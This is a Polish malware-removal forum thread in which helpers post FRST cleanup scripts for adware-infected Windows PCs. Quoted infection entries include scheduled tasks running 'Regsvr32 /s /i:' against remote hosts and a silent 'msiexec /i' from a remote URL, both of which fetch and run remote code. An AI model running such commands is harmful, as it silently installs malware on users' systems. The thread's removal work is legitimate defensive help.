hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Zoohair RemoveDirectory: C:\Users\Kris\AppData\Local\Zoohair R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [brak podpisu cyfrowego] R2 Kitty; C:\Users\Kris\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [brak podpisu cyfrowego] R2 SNARE; C:\Users\Kris\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S2 MBAMChameleon; \SystemRoot\system32\drivers\MBAMChameleon.sys [X] U2 McMPFSvc; Brak ImagePath S3 OATool; \??\C:\Users\ADMINI~1\AppData\Local\Temp\OAToolx64.sys [X] RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Kris\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Kris\AppData\Local\Firefox C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk FirewallRules: [{C1AAC7C0-CFC0-476B-9704-8C4E1786E18C}] => (Allow) C:\Program Files (x86)\Zoohair\Application\chrome.exe DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Kris\AppData\Local\Mozilla C:\Users\Kris\AppData\Roaming\Mozilla C:\Users\Kris\AppData\Roaming\Profiles CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Kris\AppData\Local CMD: dir /a C:\Users\Kris\AppData\LocalLow CMD: dir /a C:\Users\Kris\AppData\Roaming CMD: ipconfig /flushdns RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, by cofnąć modyfikacje infekcji. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). zoohair;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

OK.

Całość pomyślnie wykonana*. Ponownie proszę o podsumowanie stanu systemu. * - przeglądarka Google Chrome widoczna w logu FRST jest martwa i nie mogę jej usunąć, nie sugerować się.

Jakie dokładnie adresy DNS są przywracane? Jeśli chodzi o MBAM to wykrywa tylko cracka do siebie samego i kto wie, czy to właśnie nie tu leży problem? Cracki to ścierwo, niebezpieczne ścierwo. To tak na marginesie. Jak uzyskam odpowiedź dot. DNS to przejdę dalej, bo w raportach brak oznak infekcji. Będę poszerzał diagnostykę względem routera (FRST nie pokazuje nic ciekawego) i MBR. Sprawdź czy przeglądarka nie jest synchronizowana - KLIK. Jeśli jest to nie ma się co dziwić temu - po prostu wyloguj się.

Wszystko pomyślnie wykonane i wygląda to już w porządku. Piszesz, że problem ustąpił, a podejrzanych plików już nawet nie ma - myślę, że możemy kończyć. Te dwie detekcje z MBAM daj do kasacji, to nie pliki systemowe. Jeden to szczątkowy PUP, a drugi to instalacja zwierające sugestię instalacji adware / PUP. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

OK, ja czekał, aż dostarczysz raport z czyszczenia (jest tylko ze skanowania) AdwCleaner - dlatego nie odpowiadałem.

1. Zagrożenia wykryte przez MBAM daj do kasacji. Dostarcz raport z tego działania. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Everness R2 SNAREA; C:\Users\Vaengar\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] RemoveDirectory: C:\Users\Vaengar\AppData\Local\SNAREA C:\Users\Vaengar\AppData\Roaming\Microsoft\Word\Nowy%20OpenDocument%20Dokument%20tekstowy305872102102719150\Nowy%20OpenDocument%20Dokument%20tekstowy.odt.lnk C:\Program Files\Google\Chrome C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\User\AppData\Local\Google\Chrome DeleteKey: HKCU\Software\Google\Chrome DeleteKey: HKCU\Software\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} DeleteKey: HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} DeleteKey: HKLM\SOFTWARE\Google\Chrome DeleteKey: HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} DeleteKey: HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt (raport wynikowy). 3. Podsumuj obency stan systemu oraz zrób log FRST (już bez Addition i Shortcut). Pokaż też plik Fixlog.

Nie dostarczyłeś raportu z AdwCleaner, więc musimy powtórzyć działanie. Nie, to nie Rootkit, a nowoczesne adware, które podmieniło program Mozilla FireFox (oraz nieistniejący Google Chrome) na swoją szkodliwa, prefabrykowaną kopie z reklamami etc. To jedna strona medalu, która wydaję się być łatwo do leczenia i tym się w ogóle nie przejmuję. Martwi mnie ten wpis w Harmonogramie zadań: Task: {F16ED5B1-D2D9-4410-A00A-AF75326949F0} - \Microsoft\Windows\Maintenance\WinSAT -> Brak pliku widziałem podobną modyfikacje przy infekcji Vbklip / Banatrix. Hmm...nawet jeśli to FRST sygnalizuję brak pliku do celowego. No nic poczekam na wynik z MBAM. Pod koniec dezynfekcja obowiązkowa zmiana haseł we wszystkich serwisach logowania, a już w szczególności w banku. P.S: Kasuję plik instalacyjny SpyHunter, bo to wątpliwa aplikacja, niepolecana. Do poczytania: KLIK. 1. Włącz funkcję przywracanie systemu (ale niczego nie przywracaj). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {D4BC4E2C-2536-4C00-A27B-A457F94CB84B} - \Reuksy -> Brak pliku Task: {DF334C75-B544-4A39-9609-51E7A98F1F72} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () Task: {E303E5C5-B4A5-41C9-AF16-81EE101B675D} - \AutoPico Daily Restart -> Brak pliku Task: {F16ED5B1-D2D9-4410-A00A-AF75326949F0} - \Microsoft\Windows\Maintenance\WinSAT -> Brak pliku RemoveDirectory: C:\Program Files (x86)\MIO HKU\S-1-5-21-3106282050-108205753-2009622092-1002\Software\Classes\regfile: regedit.exe "%1" FirewallRules: [{45176380-FD23-4D33-B4B7-4F8DB5420A5A}] => (Allow) C:\Program Files (x86)\Everness\Application\chrome.exe FirewallRules: [{22FE8A08-25A2-4C23-904D-4614CE6512B8}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{3BD0FCB0-CD6E-4284-953A-158D9B94F934}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Everness RemoveDirectory: C:\Program Files (x86)\Firefox HKLM-x32\...\Run: [] => [X] HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1 HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKLM\...\Policies\Explorer: [NoResolveSearch] 1 HKU\S-1-5-21-3106282050-108205753-2009622092-1002\...\Run: [AdobeBridge] => [X] HKLM\...\Providers\q2cq9u9l: C:\Program Files (x86)\Stitught Adapter\local64spl.dll RemoveDirectory: C:\Program Files (x86)\Stitught Adapter ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku GroupPolicy: Ograniczenia GroupPolicy\User: Ograniczenia GroupPolicyScripts: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-3106282050-108205753-2009622092-1002\Software\Microsoft\Internet Explorer\Main,Start Page = R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [108544 2017-04-26] () [brak podpisu cyfrowego] R2 SNARE; C:\Users\Vaengar\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\Vaengar\AppData\Roaming\WinSAPSvc\WinSAP.dll [513536 2017-05-02] (win) [brak podpisu cyfrowego] S2 NVIDIA Wireless Controller Service; "C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe" [X] S3 WiseBootAssistant; C:\BAZA\Wise Care 365\BootTime.exe [X] S2 ZAMSvc; "C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe" /service [X] U4 CscService; Brak ImagePath U4 dcpsvc; Brak ImagePath U4 DiagTrack; Brak ImagePath U4 Fax; Brak ImagePath S0 FNETHYRAMAS; System32\drivers\FNETHYRAMAS.SYS [X] U4 IEEtwCollectorService; Brak ImagePath U4 lfsvc; Brak ImagePath U4 MapsBroker; Brak ImagePath S3 MSICDSetup; \??\G:\CDriver64.sys [X] U4 napagent; Brak ImagePath S3 NTIOLib_1_0_C; \??\G:\NTIOLib_X64.sys [X] U4 PeerDistSvc; Brak ImagePath U4 RetailDemo; Brak ImagePath U4 TimeBroker; Brak ImagePath U4 vmicheartbeat; Brak ImagePath U4 vmickvpexchange; Brak ImagePath U4 vmicrdv; Brak ImagePath U4 vmicshutdown; Brak ImagePath U4 vmictimesync; Brak ImagePath U4 vmicvss; Brak ImagePath U4 WbioSrvc; Brak ImagePath U4 WcsPlugInService; Brak ImagePath U4 wercplsupport; Brak ImagePath U4 WerSvc; Brak ImagePath U4 WPCSvc; Brak ImagePath U4 XblAuthManager; Brak ImagePath U4 XblGameSave; Brak ImagePath U4 XboxNetApiSvc; Brak ImagePath S1 ZAM; \??\C:\Windows\System32\drivers\zam64.sys [X] 2017-04-27 22:49 - 2017-04-27 22:49 - 04615856 _____ (Enigma Software Group USA, LLC.) C:\Users\Vaengar\Downloads\SpyHunter-Installer.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico\AutoPico.lnk C:\Users\Vaengar\Desktop\Gry\Just Cause 3.lnk C:\Users\Vaengar\Desktop\Gry\Middle Earth - Shadow of Mordor.lnk C:\Users\Vaengar\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Arturia\Spark VDM\Manual.lnk C:\Users\Vaengar\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Vaengar\Desktop\firefox.exe.lnk C:\Users\Vaengar\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\firefox.exe.lnk C:\Users\Vaengar\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt (raport wynikowy). 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą lub jakąkolwiek inną zaufaną przeglądarkę jako domyślną. To wymagany krok, aby usunąć modyfikacje infekcji. 4. Pomimo wcześniejszych akcji: zastosuj AdwCleaner najpierw z opcji Skanuj, a następnie z opcji Oczyść. Dostarcz raport z tego działania. 5. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 6. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). everness;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Witam, temat nie zostanie przetworzony ze względu na uzyskanie pomocy na innym forum - KLIK. Zamykam.

System jest mocno zainfekowany przez programu typu adware / PUP. Tytułowy YAC jest widoczny i jeśli nie uda się go odinstalować normalnie to zrobi to automatycznie AdwCleaner. Ty prosisz mnie o pomoc, - ja Ci pomogę, ale proszę doceń nasze starania i przeczytaj o Portale z oprogramowaniem / Instalatory - na co uważać. 1. Przez panel sterowania odinstaluj: Wątpliwe skanery / fałszywe oprogramowanie: YAC(Yet Another Cleaner!)*. Przestarzałe i nieskuteczne już programy: Spybot - Search & Destroy. * - jeśli się nie powiedzie to proszę spróbować to zrobić z poziomu Trybu Awaryjnego (klik w klawisz F8 przed startem systemu). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {0BE84C32-6204-49DD-A2D5-16BD1766244E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== scrobj.dll Task: {4394A7B2-212D-4BAB-A580-8DEA3DE21774} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () C:\Program Files (x86)\MIO Task: {A5242023-7278-4F8D-A264-CB9370714F70} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== scrobj.dll ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Eastness RemoveDirectory: C:\Users\Norbert\AppData\Local\Eastness AlternateDataStreams: C:\ProgramData\Temp:07BF512B [129] FirewallRules: [{CDBB5FAE-B6D9-459C-94BA-C7556DAC703D}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-859463877-3988447155-127319224-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== /q HKU\S-1-5-21-859463877-3988447155-127319224-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1 ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} HKU\S-1-5-21-859463877-3988447155-127319224-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ HKU\S-1-5-21-859463877-3988447155-127319224-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> 